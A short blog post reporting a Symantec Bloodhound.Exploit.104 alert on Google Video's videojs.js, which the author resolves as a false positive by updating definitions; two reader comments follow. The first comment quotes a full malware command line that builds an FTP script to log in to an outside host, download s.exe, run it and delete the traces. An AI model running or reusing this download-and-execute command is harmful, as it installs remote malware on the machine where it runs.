Bloodhound.Exploit.104

This evening I received several virus alerts from a computer indicating a Bloodhound.Exploit.104 infection in a file in the temporary internet files folder. The filename ended in “videojs.js”.
Bloodhound is Symantec Antivirus’s attempt at a heuristic detection. The writeup at the Symantec website indicates that Bloodhound.Exploit.104 is a heuristic detection for Microsoft Internet Explorer DHTML Node Normalize Vulnerability (as described in Microsoft Security Bulletin MS06-072).
A quick Google revealed that videojs.js is a javascript used on the website video.google.com. A visit to that website, and soon I too had Symantec detecting the bloodhound.exploit.104. (and the video would not load) I am using the 12/12 rev 19 virus definitions.
I looked at www.symantec.com/avcenter and found that there is a newer virus definition available. I used liveupdate to update to 12/12 rev 51. This seems to have solved the problem.

2 Comments

  1. This particular script acts as follows:
    it opens the run command, then the following
    %systemroot%\system32\cmd.exe
    then
    cmd /c echo open http://ftp.volja.net 21 >> ik &echo user uros777 bleh777 >> ik &echo binary >> ik &echo get s.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &s.exe &exit
    When I got infected I happened to be typing a search query in Google and that changed the focus of this script so the letters started self-typing into Google search box.

  2. That’s interesting, but I’m not following how its related. Have you seen what you’re reporting as bloodhound.exploit.104?
    In what I’m reporting, I know its a false positive because once I updated to the next def update, the files were scanned and restored from quarantine.
    What you’re seeing is similar to http://isc.sans.org/diary.php?storyid=1945&rss although it could really be anything.

Comments are closed.